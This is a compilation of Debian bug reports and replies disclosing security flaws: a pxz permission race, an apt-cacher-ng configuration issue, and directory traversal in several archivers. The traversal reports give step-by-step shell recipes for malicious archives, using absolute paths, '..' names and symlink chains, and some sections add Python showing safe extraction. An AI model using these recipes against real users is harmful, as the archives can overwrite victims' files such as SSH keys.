Bug#884881: apt-cacher-ng: Remap-... directives without TargetURLs are incompatible with ForceManaged
Package: apt-cacher-ng
Version: 2-1~bpo8+1
Tags: security

It seems the conf line 'Remap-secdeb: security.debian.org' doesn't work with 'ForceManaged: 1'. It works without ForceManaged -- files are put in cache under secdeb. And it works with ForceManaged if you add 'security.debian.org' once more as TargetURLs. Here is a test illustrating the problem:

--
# apt-get purge apt-cacher-ng -y && rm -r /etc/apt-cacher-ng/ && apt-get install apt-cacher-ng
[skip]
# echo 'Remap-secdeb: security.debian.org' > /etc/apt-cacher-ng/my.conf
# service apt-cacher-ng restart
# curl -I -x http://127.0.0.1:3142/ http://security.debian.org/dists/jessie/updates/InRelease
HTTP/1.1 200 OK
Content-Length: 63113
Last-Modified: Wed, 20 Dec 2017 21:47:45 GMT
Content-Type: application/octet-stream
Date: Wed Dec 20 21:55:39 2017
Server: Debian Apt-Cacher NG/0.8.0
X-Original-Source: http://security.debian.org/dists/jessie/updates/InRelease
Connection: Keep-Alive
# ls /var/cache/apt-cacher-ng/
secdeb
# echo 'ForceManaged: 1' >> /etc/apt-cacher-ng/my.conf
# service apt-cacher-ng restart
# curl -I -x http://127.0.0.1:3142/ http://security.debian.org/dists/jessie/updates/InRelease
HTTP/1.1 403 Forbidden file type or location: http://security.debian.org/dists/jessie/updates/InRelease
Content-Length: 186
Content-Type: text/html
Date: Wed Dec 20 21:55:39 2017
Server: Debian Apt-Cacher NG/0.8.0
Connection: Keep-Alive
# echo 'Remap-secdeb: security.debian.org ; security.debian.org' > /etc/apt-cacher-ng/my.conf
# echo 'ForceManaged: 1' >> /etc/apt-cacher-ng/my.conf
# service apt-cacher-ng restart
# curl -I -x http://127.0.0.1:3142/ http://security.debian.org/dists/jessie/updates/InRelease
HTTP/1.1 200 OK
Content-Length: 63113
Last-Modified: Wed, 20 Dec 2017 21:47:45 GMT
Content-Type: application/octet-stream
Date: Wed Dec 20 21:55:39 2017
Server: Debian Apt-Cacher NG/0.8.0
X-Original-Source: http://security.debian.org/dists/jessie/updates/InRelease
Connection: Keep-Alive
--

Tested with apt-cacher-ng from jessie (0.8.0-3) and from jessie-backports (2-1~bpo8+1).

AIUI it should work without TargetURLs. The doc at [1] seems to imply it:

"If the ForceManaged option is set, only requests to URL matched in some Remap-... config is allowed."

[1] https://www.unix-ag.uni-kl.de/~bloch/acng/html/config-serv.html#remap-trickz

And a comment in /etc/apt-cacher-ng/acng.conf for Remap-secdeb without TargetURLs directly talks about the ForceManaged use case:

# This is usually not needed for security.debian.org because it's always the
# same DNS hostname. However, it might be enabled in order to use hooks
# or ForceManaged mode or special flags in this context. Not set by default.
# Remap-secdeb: security.debian.org

I've put the 'security' tag on this bug as a straightforward and documented config will cause clients to miss security updates. A simple test from an admin of this setup would reveal the problem so the danger doesn't seem great:-)

--
Alexander Cherepanov
Bug#775306: pxz: race condition in setting permissions on output file
Package: pxz
Version: 4.999.99~beta3+git659fc9b-2
Tags: security

pxz sets the mode of an output file to be the same as the one of an input file but does it only after compression is over. This leaves the output file with the wrong mode during all the time of the compression process.

Illustration:

$ truncate -s 1G foo
$ chmod 600 foo
$ pxz foo &
[1] 9240
$ ls -l foo.xz
-rw-r--r-- 1 user user 0 Jan 14 00:33 foo.xz
$ wait %
[1]+  Done                    pxz foo
$ ls -l foo.xz
-rw------- 1 user user 161976 Jan 14 00:33 foo.xz

The issue is similar to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0296 .

--
Alexander Cherepanov

--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
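The window the report describes lies between creating foo.xz with the default mode and the chmod at the end of compression. The following is an added example, not pxz's code, that puts the safe creation routine next to the racy pattern: the output carries the input's permission bits from the instant it exists, and O_EXCL refuses a pre-existing file or symlink at the output path. The function names are assumptions and the scratch files are constructed for the demo.

```python
import os
import shutil
import stat
import tempfile


def create_output_racy(src, dst):
    """The pattern the report describes: create with the default mode now and
    copy the input's mode only after compression finishes (not shown)."""
    return os.open(dst, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o666)


def create_output_like(src, dst):
    """Create `dst` carrying the permission bits of `src` from the first
    instant it exists. O_EXCL makes creation fail on an existing file or a
    pre-planted symlink at `dst` instead of truncating or following it."""
    mode = stat.S_IMODE(os.stat(src).st_mode)
    fd = os.open(dst, os.O_WRONLY | os.O_CREAT | os.O_EXCL, mode)
    # os.open applies the umask, which can only clear bits; fchmod then
    # restores the exact source mode on the already-private file.
    os.fchmod(fd, mode)
    return fd


def demo_output_mode():
    """Mode observed on the output right after creation, before any data is
    written, for the racy and the safe routine: returns (racy, safe)."""
    old_umask = os.umask(0o022)        # fixed so the demo is reproducible
    work = tempfile.mkdtemp(prefix="pxz-demo-")
    try:
        src = os.path.join(work, "foo")
        with open(src, "wb") as f:
            f.write(b"constructed input\n")
        os.chmod(src, 0o600)           # like 'chmod 600 foo' in the report
        observed = []
        for make, name in ((create_output_racy, "racy.xz"),
                           (create_output_like, "safe.xz")):
            fd = make(src, os.path.join(work, name))
            observed.append(stat.S_IMODE(os.fstat(fd).st_mode))
            os.close(fd)
        return tuple(observed)
    finally:
        os.umask(old_umask)
        shutil.rmtree(work)


if __name__ == "__main__":
    racy, safe = demo_output_mode()
    print("racy: %04o  safe: %04o" % (racy, safe))   # racy: 0644  safe: 0600
```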
Bug#775218: ppmd: directory traversal vulnerability
Package: ppmd
Version: 10.1-5
Tags: security

ppmd is susceptible to directory traversal vulnerabilities. While decompressing a file, it will happily use absolute and relative paths taken from the input. This can be exploited by a malicious compressed file to write files outside the current directory.

1. Absolute path.

A sample could be prepared in the following way:

$ touch XtmpXabs
$ ppmd e -ftest.pmd XtmpXabs
$ sed -i 's|XtmpXabs|/tmp/abs|g' test.pmd
$ rm XtmpXabs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ ppmd d test.pmd
Fast PPMII compressor for textual data, variant J, Apr 19 2012
/tmp/abs: 5 1, 40.00 bpb, used: 0.0MB, speed: 1 KB/sec
$ ls /tmp/abs
/tmp/abs

2. Relative path with ..

A sample could be prepared in the following way:

$ touch XXXrel
$ ppmd e -ftest.pmd XXXrel
$ sed -i 's|XXXrel|../rel|g' test.pmd
$ rm XXXrel

Then check it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ ppmd d test.pmd
Fast PPMII compressor for textual data, variant J, Apr 19 2012
../rel: 5 1, 40.00 bpb, used: 0.0MB, speed: 1 KB/sec
$ ls ../rel
../rel

--
Alexander Cherepanov
Bug#774978: pigz: directory traversal vulnerability
Package: pigz
Version: 2.3.1-1
Tags: security

pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring the file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory.

1. Absolute path.

A sample could be prepared in the following way:

$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ unpigz -N abs.gz
$ ls /tmp/abs
/tmp/abs

2. Relative path with ..

A sample could be prepared in the following way:

$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ unpigz -N rel.gz
$ ls ../rel
../rel

--
Alexander Cherepanov
Bug#774989: kgb: directory traversal vulnerability
Package: kgb
Version: 1.0b4+ds-13.2
Tags: security

kgb is susceptible to a directory traversal vulnerability. While extracting an archive, it will happily use absolute paths taken from the archive. This can be exploited by a malicious archive to write files outside the current directory.

A sample archive could be prepared in the following way:

$ touch /tmp/abs
$ kgb -0 test.kgb /tmp/abs
$ rm /tmp/abs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ kgb test.kgb
Extracting archive KGB_arch -0 test.kgb ...
0KB /tmp/abs: extracted 0KB - 0KB w 0.00s.
$ ls /tmp/abs
/tmp/abs

Notes:
- kgb already rejects paths with .. ;
- kgb doesn't handle symlinks at all.

--
Alexander Cherepanov
Bug#774953: jar(1): directory traversal
Package: openjdk-7-jdk
Version: 7u71-2.5.3-2
Tags: security

jar(1) is susceptible to a directory traversal vulnerability. While extracting an archive, it will happily use absolute and relative paths taken from the archive. This can be exploited by a malicious archive to write files outside the current directory.

For example, let's create a sample archive:

$ mkdir Xtmp/ XX/
$ touch Xtmp/abs XX/rel
$ jar -cMvf test.jar Xtmp/abs XX/rel
$ sed -i 's|Xtmp/|/tmp/|g;s|XX/|../|g' test.jar
$ rm -r Xtmp/ XX/

and then test it:

$ ls /tmp/abs ../rel
ls: cannot access /tmp/abs: No such file or directory
ls: cannot access ../rel: No such file or directory
$ jar -xvf test.jar
extracted: /tmp/abs
extracted: ../rel
$ ls /tmp/abs ../rel
../rel  /tmp/abs

My `jar` points to /etc/alternatives/jar, which points to /usr/lib/jvm/java-7-openjdk-amd64/bin/jar .

Not sure if this is just CVE-2005-1080 not fixed or something else. But please note that CVE-2005-1080 talks about .. only.

--
Alexander Cherepanov
Bug#774954: ha: directory traversal vulnerabilities
Package: ha
Version: 0.999p+dfsg-5
Tags: security

ha is susceptible to directory traversal vulnerabilities. While extracting an archive, it will happily use absolute and relative paths taken from the archive. This can be exploited by a malicious archive to write files outside the current directory.

ha seems to store file names separately from their paths. Directory traversals are possible through both of the parts.

1. Through the file name part.

A sample archive could be prepared in the following way:

$ touch XtmpXabs XXXrel
$ ha a test.ha XtmpXabs XXXrel
$ sed -i 's|XtmpXabs|/tmp/abs|g;s|XXXrel|../rel|g' test.ha
$ rm XtmpXabs XXXrel

Then check it works:

$ ls /tmp/abs ../rel
ls: cannot access /tmp/abs: No such file or directory
ls: cannot access ../rel: No such file or directory
$ ha lf test.ha
HA 0.999 Copyright (c) 1995 Harri Hirvola

Archive : test.ha (2 files)

filename  original  compressed  rate  date  time  m  CRC-32  path  attr
===
/tmp/abs  0  0  100.0 %  2015-01-09 15:24  CPY  (none)  -rw-r--r--
---
../rel  0  0  100.0 %  2015-01-09 15:24  CPY  (none)  -rw-r--r--
===
2  0  0  100.0 %
$ ha x test.ha
HA 0.999 Copyright (c) 1995 Harri Hirvola

Archive : test.ha (2 files)

Unpacking CPY 100 % /tmp/abs
Unpacking CPY 100 % ../rel
$ ls /tmp/abs ../rel
../rel  /tmp/abs

2. Through the path part.

A sample archive could be prepared in the following way:

$ mkdir Xtmp/ XX/
$ touch Xtmp/abs XX/rel
$ ha a test.ha Xtmp/abs XX/rel
$ sed -i 's|Xtmp|/tmp|g;s|XX|..|g' test.ha
$ rm -r Xtmp/ XX/

Then check it works:

$ ls /tmp/abs ../rel
ls: cannot access /tmp/abs: No such file or directory
ls: cannot access ../rel: No such file or directory
$ ha lf test.ha
HA 0.999 Copyright (c) 1995 Harri Hirvola

Archive : test.ha (2 files)

filename  original  compressed  rate  date  time  m  CRC-32  path  attr
===
abs  0  0  100.0 %  2015-01-09 15:29  CPY  /tmp/  -rw-r--r--
---
rel  0  0  100.0 %  2015-01-09 15:29  CPY  ../  -rw-r--r--
===
2  0  0  100.0 %
$ ha x test.ha
HA 0.999 Copyright (c) 1995 Harri Hirvola

Archive : test.ha (2 files)

Unpacking CPY 100 % /tmp/abs
Unpacking CPY 100 % ../rel
$ ls /tmp/abs ../rel
../rel  /tmp/abs

--
Alexander Cherepanov
Bug#774669: cpio: directory traversal vulnerability via symlinks
Hi!

The --no-absolute-filenames option seems to be intended to limit extracting the contents of an archive to strictly inside the current directory (it guards against both absolute paths and relative paths with .. in them). However, it can be bypassed with symlinks.

While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory.

For example, let's create a sample archive:

ln -s /tmp dir
touch /tmp/file
echo 'dir
dir/file' | cpio -ov > test.cpio
rm dir /tmp/file

and then test it:

cpio --no-absolute-filenames -iv < test.cpio

This will create a symlink dir in the current directory and a file /tmp/file by following this symlink.

BTW, why is --no-absolute-filenames not the default? In contrast with tar, which is secure by default.

--
Alexander Cherepanov
Bug#774669: Directory traversal through symlinks
Hi Vasyl,

On Wed, 7 Jan 2015 15:43:54 +0100 Vasyl Kaigorodov vkaig...@redhat.com wrote:
> My quick test shows that with the proper filesystem permissions no harm could be done:
>
> $ pwd
> /home/vk/cpio
> $ ls -lad /home/postgres/
> drwx------ 4 postgres postgres 4096 May 21 2014 /home/postgres/
> $ ln -s /home/postgres/.mozilla dir
> ...
> $ cpio --no-absolute-filenames -ivF test.cpio
> dir
> cpio: dir/file: Cannot open: Permission denied
> dir/file
> 1 block

The problem is not that you can bypass filesystem permissions with cpio. cpio is not setuid or special in any other way. Hence filesystem permissions protect from it just fine.

The problem is with unpacking untrusted archives (downloaded from the Web, received by email etc.). If the unpacker doesn't protect from directory traversals, extracting the contents of a malicious archive could lead to overwriting sensitive files such as /home/vkaigoro/.ssh/authorized_keys, i.e. your own files, strictly within filesystem permissions.

> Do you think this is a valid case for a CVE?

Yes.

--
Alexander Cherepanov
Bug#774716: paxtar: directory traversal vulnerabilities
Package: pax
Version: 1:20140703-2
Tags: security

paxtar is susceptible to directory traversal vulnerabilities. They can be exploited by a rogue archive to write files outside the current directory.

1. paxtar will extract files with .. components in names.

For example, let's create a sample archive:

echo hello > ../file
paxtar cvf test.tar ../file
rm ../file

and then test it:

paxtar xvf test.tar

This will create a file ../file.

2. While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries.

For example, let's create a sample archive:

ln -s /tmp dir
paxtar cvf test.tar dir
rm dir
mkdir dir
echo hello > dir/file
paxtar rvf test.tar dir/file
rm -r dir

and then test it:

paxtar xvf test.tar

This will create a symlink dir in the current directory and a file /tmp/file.

--
Alexander Cherepanov
Bug#774669: Directory traversal through symlinks
Package: cpio
Version: 2.11+dfsg-0.1+deb7u1
Tags: security

cpio is susceptible to a directory traversal vulnerability. While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory.

Example:

1) create a sample archive:

ln -s /tmp dir
echo dir | cpio -oF test.cpio
rm dir
mkdir dir
echo hello > dir/file
echo dir/file | cpio -oAF test.cpio
rm -r dir

2) test it:

cpio --no-absolute-filenames -ivF test.cpio

This will create a symlink dir in the current directory and a file /tmp/file.

--
Alexander Cherepanov
Bug#774660: Directory traversal through symlinks
Package: p7zip-full
Version: 9.20.1~dfsg.1-4
Tags: security

7z (and 7zr) is susceptible to a directory traversal vulnerability. While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory.

Example:

1) create a sample archive:

ln -s /tmp dir
7z a test.7z dir
rm dir
mkdir dir
echo hello > dir/file
7z a test.7z dir/file
rm -r dir

2) test it:

7z x test.7z

This will create a symlink dir in the current directory and a file /tmp/file.

This can also be exploited through zip, arj and maybe other archives.

--
Alexander Cherepanov
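The ppmd, pigz, kgb, jar, ha, cpio, paxtar and 7z reports on this page come down to two escapes: an entry name that is absolute or contains '..', and an entry whose parent directory is a symlink that an earlier entry created. The following is an added example, not code from any of those tools, of the confinement check an extractor should run before creating each entry (for a format like ha that stores path and file name separately, apply it to the joined path). safe_target and demo_extraction are assumed names; the entry sequence is constructed to mirror the reports, with a scratch directory standing in for /tmp.

```python
import os
import shutil
import tempfile


def safe_target(dest, name):
    """Return the absolute path at which archive entry `name` may be created
    under `dest`, or raise ValueError if doing so would touch anything outside.
    (Added example; safe_target is an assumed name, not any tool's API.)"""
    if not name or os.path.isabs(name):
        raise ValueError("absolute or empty entry name: %r" % name)
    root = os.path.realpath(dest)
    # Lexical check: refuses '../rel' and the like ('a/../../rel' too).
    target = os.path.normpath(os.path.join(root, name))
    if target == root or os.path.commonpath([root, target]) != root:
        raise ValueError("entry escapes destination via '..': %r" % name)
    # Physical check: resolve symlinks already present in the parent path.
    # This is what stops the cpio/7z/paxtar sequence, where entry 1 created
    # the symlink 'dir -> /tmp' and entry 2 is 'dir/file'.
    parent_real = os.path.realpath(os.path.dirname(target))
    if os.path.commonpath([root, parent_real]) != root:
        raise ValueError("entry escapes destination via symlink: %r" % name)
    # Do not write through a symlink as the final component either.
    if os.path.islink(target):
        raise ValueError("entry would write through a symlink: %r" % name)
    return target


def demo_extraction():
    """Replay the reports' entry sequences against scratch directories and
    return {entry name: allowed?}. Entries are constructed for this example;
    `outside` stands in for /tmp."""
    dest = tempfile.mkdtemp(prefix="extract-")
    outside = tempfile.mkdtemp(prefix="outside-")
    verdicts = {}
    try:
        for name in ("/tmp/abs", "../rel", "sub/file", "dir", "dir/file"):
            try:
                target = safe_target(dest, name)
            except ValueError:
                verdicts[name] = False
                continue
            verdicts[name] = True
            if name == "dir":
                # Entry 'dir' is itself a symlink; creating it writes only
                # inside dest, so it is the following entry that gets refused.
                os.symlink(outside, target)
        return verdicts
    finally:
        shutil.rmtree(dest)
        shutil.rmtree(outside)


if __name__ == "__main__":
    for name, ok in demo_extraction().items():
        print("%-9s %s" % (name, "extract" if ok else "REFUSED"))
```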
Bug#774211: freeze exception for binutils 2.25-3
On 2014-12-30 14:05, Matthias Klose wrote:
> - several fixes for CVE issues, the security team asked to include these into jessie.
>   - CVE-2014-8484 (PR binutils/17509).
>   - CVE-2014-8485, CVE-2014-8504 (PR binutils/17510).
>   - CVE-2014-8501, CVE-2014-8502, CVE-2014-8503 (PR binutils/17512).

Please note that PR binutils/17512 includes many more issues/fixes than those CVEs. And there is also PR binutils/17531 ...

--
Alexander Cherepanov
Bug#770166: Several crashes opening malformed files
Hi,

On 2014-11-19 15:11, Rene Engelhard wrote:
> On Wed, Nov 19, 2014 at 01:26:54PM +0300, Alexander Cherepanov wrote:
>> Package: libreoffice
>> Version: 1:3.5.4+dfsg2-0+deb7u2
>>
>> Please note that there are several crashes in the version of LibreOffice shipped with Debian wheezy. Issues are reported upstream, the list is here:
>>
>> http://www.openwall.com/lists/oss-security/2014/11/19/3
>
> Aha. Hangs and crashes only

Not sure what you mean. If you talk about master -- maybe. But for 3.5.4 https://bugs.freedesktop.org/show_bug.cgi?id=86449 (and the list linked above) clearly says "potentially exploitable". Do you disagree with this assessment and need an actual exploit?

> - and then oss-security?

Why not? At least it could serve as additional data for an ongoing discussion there about fuzzing and software quality.

> FWIW, I agree with Michael here. If you would care about those issues for everyone this simply would mean that for all reverse-engineered/proprietary formats every bug in this case would be a security

Yes, that would be a security issue. What is surprising about it? Should it be any different from, e.g., browsers?

> update with all the brimborium and DSA etc. No, that's not sensible, I think.

How to deal with it is an entirely different question. One can think about various possible solutions -- from adding a "Known bugs" section to the man page stating "Opening a file in LO that you get by email can cause you to lose the work you are doing in another LO window or your computer to be pwned." to disabling some input filters by default (and caring about other filters).

> Unless someone proves this has real impact _and has patches_

As of now, some of the mentioned issues are already fixed upstream. Not sure how easy it would be to backport fixes though.

> I am not going to care. This is in a dead-upstream version anyway.

If there is nobody who cares enough about LO to join you supporting it in Stable perhaps it should be EOLed similar to Iceweasel? And now seems to be a good time to think about it for the next release cycle.

--
Alexander Cherepanov
Bug#770166: Several crashes opening malformed files
Package: libreoffice
Version: 1:3.5.4+dfsg2-0+deb7u2

Please note that there are several crashes in the version of LibreOffice shipped with Debian wheezy. Issues are reported upstream, the list is here:

http://www.openwall.com/lists/oss-security/2014/11/19/3

--
Alexander Cherepanov